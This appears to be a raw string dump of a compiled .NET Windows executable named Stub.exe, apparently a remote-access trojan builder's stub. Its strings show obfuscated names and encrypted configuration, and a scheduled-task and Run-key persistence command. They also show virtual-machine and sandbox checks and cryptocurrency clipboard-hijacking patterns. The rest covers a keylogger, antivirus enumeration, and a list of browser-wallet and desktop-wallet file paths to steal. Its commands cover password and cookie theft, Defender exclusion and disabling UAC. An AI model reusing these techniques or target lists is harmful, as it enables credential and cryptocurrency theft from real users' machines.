!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
<Main>b__1_0
<Read>b__0
<GetText>b__0
<SetText>b__0
<Read>b__2_1
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
user32
ToUInt32
ReadInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
nGVEHGnjruAA
hMDpabtPEA
KSXKAUyKbDVEA
JbeMgDWBxsUPA
GMCFVdOLAunNFpTA
TgIZWcuQKXYA
kepcyqybDaJgA
kAIyifcxhkiA
SystemParametersInfoA
suuidAeCHaqA
LescKbKGRrySuA
aJSBcFzsKB
NtGnOVIMLFHRaUB
guwUmZzXCYfRObB
xRzvVZSfrhRQBeB
gOIqEBucHZohiB
PQeTcjVXAC
YZUrYOKMGDC
iwRflzOkRDKCaIruC
zSdKmLFSDNDECAD
MapNameToOID
get_FormatID
UCVrvUEHmSLD
GTpksBtDkSD
pKEiVBYwIkaPeYD
qBnxCrdxQsIXbD
sYqiNRFZHioD
LVBHByoyEKFYIkpD
ygKAyUnswnCZqD
HKtqMicaZSE
aJvZhiSSlLqDiJWE
QUjQsFVCmXcE
wtrENXrZTAGpEF
atFFkGfgQmDSF
QYGanQGcNQNVF
tIrPMJNKHscF
WucaUxSLqnbJdF
OeRiiGIAoirhF
SZMOXurMniF
QaFCXHAasrQkF
zMBHUutTilBG
kHWkSrcAEG
RyGdAskJgVOG
zelVHyFnBzSPG
SLGfUDRniQG
OBPyMEAVrNWG
LzPsKBaQTpobG
RFTnCGZItAdG
nzavhdZNuyIjG
gveBiTzeqpG
QlbnJewqtLH
dLVqYCvaVNH
paTLTAadScYwovQH
XaHDEyaeavUH
QjUiKrTaPYfH
iqZTwLIrhQkH
uefMEgrCaelH
HuhODgoVsBpqnH
NcsXxXynSzqTznH
bsjyzCjONcxH
iOLsfKEbTNqWzH
oeWRFXeVKEI
jXZpgkFEzEI
dJJSrqdZPEBGI
get_ASCII
qoguAmDCFTbrPnJI
aEoFddjlvYPI
lvQwGyIzSgYadI
dctRHhnRsPoI
BkfsboVryfpI
FzHMfvKlctI
ZOOvDYtfiUEltI
abDUIlMEszI
uoMawjNywYJ
twCPMzDbTTAbJ
RxUBnwEYKFxheiJ
AngPFbpUTjJ
xwudYcgUsJ
SsJKPinwqQtJ
YdeXKeiUorjtJ
sjgtIbaRkLAPJK
lXVYUeMqaKK
KFtOgqmpKCtqLK
VHnBHvfQZNK
SgIAmTzBmoPK
kUaZpVWGTK
wXwSGtGwOsYK
XMiwqmsHQUZK
YuhYNmLXZhK
XkmQQlJASedEvK
TqDNFSCwPnCL
DIgieqTXqqzcSIL
ZMBvbnZZJIkUL
rnvOrbqqhiultDuL
BhWfKgbTwL
PDGhROxAHM
CHgnJiHraOJMFIM
YEMqgKbIIRM
UzAJqrjkxSM
mUIcBAWkxCFXM
rdveArjPhYM
IfxdlTxMCftJN
edeIxJexxLN
QaCzzOJnoNIWhPN
ormGGpvBQZN
eTGJFbnrBoVaN
AweIxjRQkodN
DqMoJqAchgWOJfN
ncmIRHkCpJEcJEkN
jZvBjBnDxKgMkN
mewOBJVZHjKlN
VmORkmPShisuFmN
WCsOnWWFgmN
GpXfKpPRrAfcauQoN
qmYlTzGZkCO
System.IO
QPkCFzPRayJO
wPaRvTJiCOLO
RjUcTHGviDXWO
qqcjZeGWCpMQuWdO
AbCUrPHxBBUQP
LOOfCBQuAHQcNVP
evxcklIAcscWP
haUqFJqujYP
QiZwvNhXzAMZP
ATnAKwyViP
IolfxzIqEFsfJIkP
BmswbRqoUWzynP
UQbMZAoLfdbpAhAQ
IlzsFYcaWVQ
zBvwjmvYFzMmccXQ
pzDPKFAVZaKNbQ
AFgcBMrFCQtfQ
oGtngNpZmPiFgQ
alSIumrDoihQ
qVNtfyGIXnmQ
nhboPXcsQVzQ
HxIemjYLVMmAR
bUFyAVVhFR
oAdsZzOnVOR
YqSoyJXYkqSpPR
PGyGNvwRRujXUR
uAUAHsohEYR
WXItsNuLaR
IstSjSfKKlYlR
sDWUKUziEyinR
GEaMTTcxoR
dRwfwuIeqwsQPFDyR
FFJxagIRjMvoMdAS
VqPPfkDETCBS
VFnGgJbDivvuHS
sbkWXTkmdCIS
jEEAYRlNlnVMjEJS
wwicouuvHZMS
CztMesotbPkS
GuFJwFFxuxezS
VoXCuaIcTUKT
acuiqghvYqsMjHwST
aDBNnsbXMpBZT
qIMqajCbRSmT
xhldmneVMTpT
QvwDPlVYcfxDXsrT
GQzSaxdqjtT
IvOLkxsstkntT
TXOyBAUPCvT
FCLxHLtLGKpwCMvT
czFkSUHtMtMiszT
IOvszqbtxqOU
OHGldfnvGPVU
RLaCJSKZAseWU
pqhQwvmuYU
DYYExNPRxraU
LoopVSYyEdBDhU
EmbspFnbWDWdxlU
dJhblgnmKCxU
fzpBneSVGqHbxU
dIlQrxCePPAV
get_IV
set_IV
GenerateIV
eKxrkXVfONV
ZlQsVpecDpNV
anqDAmVAtHNwVV
oLOFsUdOhHaV
OpgLKqLSbV
vpsMzUQKYWdV
BjvxPvhYUvnLfgV
qSnnnWcwsUNkV
zQQwcqZkmV
oEuFYnNvZxV
NDuJfPWGTVBkBW
yYUeLUhlFW
iYdVgMMRhGW
AKtFZdxOIBIW
KbthbHvkSnIW
QrexobGWXKW
HTzkFiUyAlKW
TJpjPpPtPWJVW
pXoRgaxEGWW
rOQpyRVxxLmW
VbFBeRdMypW
lSVFOLBwifRocQznqW
quqozqQqoBX
cDfyOaulmIWcREX
LBMFjsecEVX
StKNBbauyodYX
WzZXsfEiHdX
WaVlTOwWlemX
eAVNNwpMNptX
EQxkerTHSjnuX
rsWvySZTlQegvX
xyRPOPCPxdyX
VtPtPKZsKFY
BPwchUSwzfZgHY
eAxHNbupVIEySY
BjoMoZGHXCrfY
GEUJHQMOkY
rpPNhlXWgcaYgqY
gjtdoGkawY
KhuxgNhIsdfLBBZ
fvkFNgkJoZbaCZ
eldrPEvGJNhzKZ
zinDhXrFyINNZ
VQNBhYxakfPXZ
MqiJwBLSDbgZ
UsnKQJWXCfakQhZ
MhwOHRsbeHpnZ
ksSjhKSbtZ
CKxYlcsZWqXruZ
XIGPffTivZ
liZBhUOuixZ
value__
iShsOpGhzlOa
GJURzpJogQa
UbKyMiJYbUa
YstFzUwhiJOMkKEda
DlqTQlOCQlha
FrrlqzMyTBb
fPsnrsrEHmDb
XvDpxyrZcQBrRb
DREAXjxZZmxiXb
GUbbYmRfdpZb
mscorlib
aRDZfMjhQplb
uwokhQpCLKgslBnb
oxQYXcSSNc
qEdHWyronbTQac
System.Collections.Generic
Microsoft.VisualBasic
zlQWrkEfYDZknc
get_SendSync
WndProc
xKdVSjIpsFBd
fPlzvKnieDd
ZNIUPaFurId
GetWindowThreadProcessId
GetProcessById
YzNHiuqFDHsDKlJd
JPTgkiHEKd
eaaMPOwxzLd
xdAnbIyvYTd
EndRead
BeginRead
Thread
pgCFWygdfcd
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
get_Guid
PcqoGCKLGkd
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
hWndChild
GnmKKODQCnd
Append
RegistryValueKind
CompareMethod
method
Clipboard
FaTwBBZiNAe
nrOgUkbqJSvshAe
wrKmeIoOCxiNe
uvbJijugbMmGqgQe
Replace
IsNullOrWhiteSpace
CreateInstance
tUFYTWHZpiMyce
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
DeleteSubKeyTree
get_Message
EndInvoke
BeginInvoke
GetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
DownloadFile
IsInRole
WindowsBuiltInRole
get_MainWindowTitle
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_ExStyle
set_ExStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
get_ProcessName
CheckHostName
DateTime
WriteLine
get_NewLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
MethodBase
Dispose
StrReverse
X509Certificate
Create
MulticastDelegate
GetKeyboardState
SetThreadExecutionState
SetApartmentState
GetKeyState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
BTEJpFdCPbWjye
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
rltLLQbFvzTRmXJf
SizeOf
DXuLnMMPTPEGYcRf
pNgMjhEytPqmmcf
qCsncZCjqTff
SYgRXwTKfkf
NtxxqzniNLNvf
SAYikTROZXxf
BjmyaJYXwWyf
IbMqGwvibYpyf
oIgydDYtyf
sDbXDLJTZUTxvJLg
RRBnpITaLBkLYOg
xxVBfSejHPg
hJdIIargbNcUg
eYvOIGmDlnnag
ezxEYkgidg
DTyNvFminDTeg
eQjafKfaNUJhg
CryptoConfig
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
set_ErrorDialog
get_Msg
reTDPksHXHVwg
pBfErOJeqxg
BkUEjNVeSUZnAh
xNhrAbcdgVodhYIh
eVbwpPYdbIh
rngcAuPVxxRlJNGJh
ZJlzIENARtSgh
gbvvSnDPstmh
jkjaMDUVwnh
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
GetFolderPath
get_Length
LpuPWDIsUxh
nifvCaOzJHZAi
VQixGwtoki
BxsjKCkJgbRmi
iMebGMOBmVxppi
gLlKUvJbrlOqi
xPtvJetaqi
KTGALkdiqi
KLPpFMVAeXui
ygxYowvewi
IpGHtWFjhoNsjyCj
bPtHtxBmGIDiEj
zOcRtyahfQQj
FcWDIktupWj
cutwxLcySzzsej
Gdtsxikpsjj
hFDxOjbhVstj
qbqXVoAIcJzj
ukymRKCZjUCxtCk
UMEhkgpgtkBuOFk
hVfUcPfPenkFk
yOWbTLUkFvGk
fDqWEyoWblbQQk
WNDRMOFtouDQak
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
callback
RegistryKeyPermissionCheck
FlushFinalBlock
xomwMccTvKgk
hrPdnDVLCtmGwk
LgTNRZkyJGXKl
wJtGoyXfUuUSRl
XqopULKkdULTl
RtlSetProcessIsCritical
Marshal
NetworkCredential
System.Security.Principal
WindowsPrincipal
dBgcSjUcrhjual
get_Interval
set_Interval
coTVHSLXMsval
HEJxnpKQfvsUfl
YMjPDJtlPnhl
xqYrZcpPmVkl
kernel32.dll
user32.dll
ntdll.dll
Control
IKUDEWCjlul
qztVQzpztyul
MLmQgfXQzl
axAxomwtRVbzl
ZBKMnMXQtMiGoIBm
rHhHslqSboMWBm
xDRtGopwBm
eYlczCyzLjJIm
igGEZkUqKJjJm
dTqWUFYHIXm
MuTzDQsnVXm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
lParam
wParam
get_Item
OperatingSystem
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
EZeeEpZQgqhsjm
OhUNIyWyBpnm
Random
ICryptoTransform
JqLnBELIeNylvym
EPHVjSpSwwVGn
bEvunKgahwFonvIn
DLGACiuxxbDtWOTn
rwXHctUYUwhYn
GJucJRSzZuZn
ToBoolean
TimeSpan
PEBHSCzumbn
WeHtBxvotxdn
nStNhxVHIfn
RhFoIleHMlfn
X509Chain
AppDomain
get_CurrentDomain
YhRzLQNiyTCvabGln
eVlkEkwAutAon
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
pattern
JEXxkZHwRwn
UwQgiwAgetuxn
wDYkHapJzn
FvaIJqWzdPo
iBpGfIzCYRo
yaevuZJsIxTo
vaJSfAmWao
ImageCodecInfo
MethodInfo
FileInfo
DriveInfo
FileSystemInfo
MemberInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
GetLastInputInfo
fEKqxbvIeHzQno
OPolCluqYno
uODUyXdvVlNvYso
anhWpsjLjNBxo
LdQobKghzCwAp
JmTBoDGsuIp
DCErjIpvXp
ZyvTkgMtgp
fcevOcGKLip
ZMYkAMyRSHPmlp
Microsoft.CSharp
aqGlBnXMAUup
gEyfRdZzloyp
kjcMSKAdaBFq
qTLAqjkAsFq
tMAIxIKauXIq
eXKGAWaKWlCbIq
yhmyOcgtBsyOq
abNseSfhxePq
mCzWeZPJbiaUq
bTLxFyUOLXMqqWq
HlARZJyDXfq
System.Linq
yZFRPvqzQjCkpq
eveFojQKcQGtIUYtq
brFYpHkpWdAr
ogibGbRobrwDr
EhuSEjvdooJr
VKxjOyCQmgkwLhUr
PesieNWfUnTDWr
MXUftDqdfmfiXZr
VhCfuyaHwosbr
iNldyhoYZMpcr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
SpecialFolder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
AddClipboardFormatListener
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
AhYpYBUFcBHir
BKfzRpKBzPZFDNskr
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
hpOPLaEuKwrr
IntPtr
jtPReUAwKyr
sQFrargTzr
ijYdrJLbECs
IECWxmKUHRCs
lTyquKqfyjDGs
VBSQtrjEZWs
cajJMdAzlbs
System.Diagnostics
get_Seconds
FromSeconds
get_Milliseconds
GetMethods
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
GetDirectories
ExpandEnvironmentVariables
GetTypes
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
get_Minutes
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
BFNiUQBeORZGCfs
qiFMIFsbaZlYgs
BindingFlags
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
ICredentials
set_Credentials
Equals
SslProtocols
RoTprLsCqls
get_CreateParams
System.Windows.Forms
Contains
System.Text.RegularExpressions
System.Collections
StringSplitOptions
gStngUOqsLos
get_Chars
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
get_Hours
FileAccess
get_Success
GetCurrentProcess
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
IzhRlIdzwXGt
KmWDrEnxJtNt
KvaLxRGBqeUt
KvLQJdIdeWVnXt
pXYElFYWkZt
Concat
ImageFormat
get_AsFloat
set_AsFloat
ManagementBaseObject
object
Collect
Connect
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
op_Explicit
yCLODrgIaJTjt
wDxmMpFkvtlt
IAsyncResult
RegexResult
result
ToUpperInvariant
WebClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
SetParent
hWndNewParent
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_TickCount
get_ProcessorCount
GetPathRoot
ParameterizedThreadStart
Convert
qsGAkcBiuOEst
FailFast
ToList
GetKeyboardLayout
JXIJQBKhkwvt
System.Collections.IEnumerator.MoveNext
System.Text
ReadAllText
GetText
SetText
GetWindowText
xlpZaLvTHu
aHuDhGrdDNnJzWu
VcTMkySppu
tBZwroRxFjQDv
OnhWUPKDjamrBMv
wCfZkvcRpuTv
WeXOVHBDIGxWv
CKcEJJKfxJbZv
WHvcoGyhRHpGcv
WEQNnMSzgZikkv
ByqwAZLFyYwv
oVLGjPkaqNxTRw
VzJMVPuDMhEjwYw
yNfQlrbnxDMgKfew
GetForegroundWindow
set_CreateNoWindow
HOcDBmOrHFerw
NkSfQSEHLAizyvw
iRWUHJmmPsrxzw
hIxpqNyapxRDx
ToUnicodeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
YdaXhPKdJaJx
QKeNFnjWbWdMKx
zUcEmoDicdex
cPAnvjJsgx
XzrZQhJngYTlx
uxheOhQqmx
UJcSIoVBhMNWpx
laScWYuAkczSrx
BOPPVeEneeux
dIKZwdGQAMy
cEDeLoXVtQy
IJFETiPcxtpqJwTQRy
ecVBYkWWLSy
NgUAcgPpdGTSy
InitializeArray
ToArray
get_AsArray
FqWtZMHByay
mxsOZbPYyby
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
MapVirtualKey
RegistryKey
BobIxnXgney
System.Security.Cryptography
Assembly
AddressFamily
uoxnVbSdOimy
BlockCopy
ToBinary
get_SystemDirectory
Registry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
qjMNWzaPCz
KAHNljbuddDGTz
BnSMalQHcySAdz
paoCIkQpOBkDYfz
OScYpKCWlz
NHHOardNaHMOrz
uFMNkPCHhedrz
yNhYaiHaIuz
edFwCdDqFduz
WrapNonExceptionThrows
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName .NET Framework 4 Client Profile
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
SHA256
c3PmC6e++28bCi96Se3mRpAmACtTP4AX9GP9KUM6pnKmH8NjL609R48x0fJlF8b232O3QWTNeDD9eLxEdeSP+Q==
vTSTUPfkGd93RlmYK8umvhsaoL0WuBCilpHCfANyCJGWCv27jJFbuwrgDp5Cm7otY7C44m2BI/MYRqE8aLZMQw==
1YCjqgBhIz3u/2YONrVtKIrmrv+H5vcAUV89mNIm1LEC10uEoCPtQc6GUiQDYRlU1NZpa2AIJIX1qsDNoODW5g==
Y5spanXxV1oKBwKpDtl0GS99BofnVEObJ5JZ4dka15dpuzO73CC58zDGuWQWTyXnXCbcu5c/JDnxftfuGRvWGg==
%AppData%
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
M3EGqxdNEo0xDlkjbI6V2grN8DaJEESxCn1a4kjDHvO9UAtDah1px1Nzkvor3GVNS+gsdybQSdH4QOX6Ehl4Qw==
u6+I5IxT+oU1Wz++oF7Pn7MRjaS9uCJ/PPzbZN0wgZRC5xhcsP41TMmVcZ57PGufG9Zf/qPsZFuHdJyRLywTag==
vslhadANxirvJkaUfWUPIKYXe6VjmOArb+CGLpidjmQT0++WdrfKtOtuVF93bX5mDQbHMnmGLwlTIuXQPjh3dg==
DfGiAjYHsZdA3g2Bba6bIgU3Z1djOq5I0KRGlaPD5qyq/j+X0jvk+Ig06qs/XM623EyDjcYlqA8bDnIUSYZ9Bg==
eWYeo8/ra35nHuIT4+Hf7HdD5Ds9jSL2Hiv8Z7WNSrKII0OeTn5S8KkdpEwCq+q4+xv7oEuswU3q0SZ1D+CGKA==
aPQ80XrzJb2kjBMOgeEo8OAyZEVg1mHn52gEZG728l4qD7QJ+h+PnmxxDhT8raP5Y72RlERDXYLJvPJNDyYBcw==
Pk/o6uhvAJ8wMmb/eaR99moAvcf8tUncqAHnTkuAGIMApguvo0ciaHoztD/PEZ6oDZSf5Bg2wFM2m/wXEQ9niw==
SfYLQPJT1j6HV50yENv0HCyfBv2uWhbU0vVhLGCsJPhjQ6ZccxRs7p4oqJzOAP+KExr66L9w9joGyFtduI90xA==
q5pBYv8A8QNFa81QHMy/NdExWjt1hA0TbcbAiJ8IpjPrMnvtfcVmBjppd9DfrQMVEyErhr/EyP3K+wqLbeTrGw==
Packet
Message
LastTime
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{26,45}\b
\b(0x)[a-zA-HJ-NP-Z0-9]{40,45}\b
T[A-Za-z1-9]{33}
BTC Clipper
ETH Clipper
TRC20 Clipper
Err HWID
ClientInfo
Microsoft Windows
Single language
Single
Language
Enterprise LTSC
Enterprise
Standard
Version
Performance
Pastebin
Antivirus
\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm\LOCK
Puplic
\AppData\Local\Microsoft\Edge\User Data\Profile 1\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm\LOCK
\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\LOCK
\AppData\Local\Google\Chrome\User Data\Profile 1\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\LOCK
\AppData\Local\Google\Chrome\User Data\Profile 2\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\LOCK
\AppData\Local\Google\Chrome\User Data\Profile 3\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\LOCK
\Mozilla\Firefox\Profiles
\extensions\webextension@metamask.io.xpi
\AppData\Local\BraveSoftware\Brave-Browser\User Data\
\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\LOCK
\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph\LOCK
\AppData\Local\Google\Chrome\User Data\Profile 1\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph\LOCK
\AppData\Local\Google\Chrome\User Data\Profile 2\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph\LOCK
\AppData\Local\Microsoft\Edge\User Data\Profile 1\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph\LOCK
(TU E)
\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\LOCK
btccore
\AppData\Local\Google\Chrome\User Data\Profile 1\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\LOCK
\AppData\Roaming\Exodus\exodus.conf.json
Exodus
\AppData\Roaming\atomic\Cookies
atomic
Atomic
\AppData\Roaming\binance\Preferences
Binance
Installed
\AppData\Roaming\Ledger Live\app.json
ledger
\AppData\Roaming\@trezor\suite-desktop\config.json
trezor
Return
Escape
LControlKey
RControlKey
RShiftKey
LShiftKey
Capital
[SPACE]
[ENTER]
[CTRL]
[Shift]
[Back]
[CAPSLOCK: OFF]
[CAPSLOCK: ON]
\Log.tmp
{0:D2}d:{0:D2}h:{1:D2}m:{2:D2}s:{3:D3}ms
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
gettxt
passload
cookiesBrowser
getmeta
anydesk
ResetScale
killps
weburl
WDExclusion
uacoff
sendPlugin
Hashes
AllInOne
Password
Cookies
Reset Scale succeeded!
AVRemoval.Class1
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Stub.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0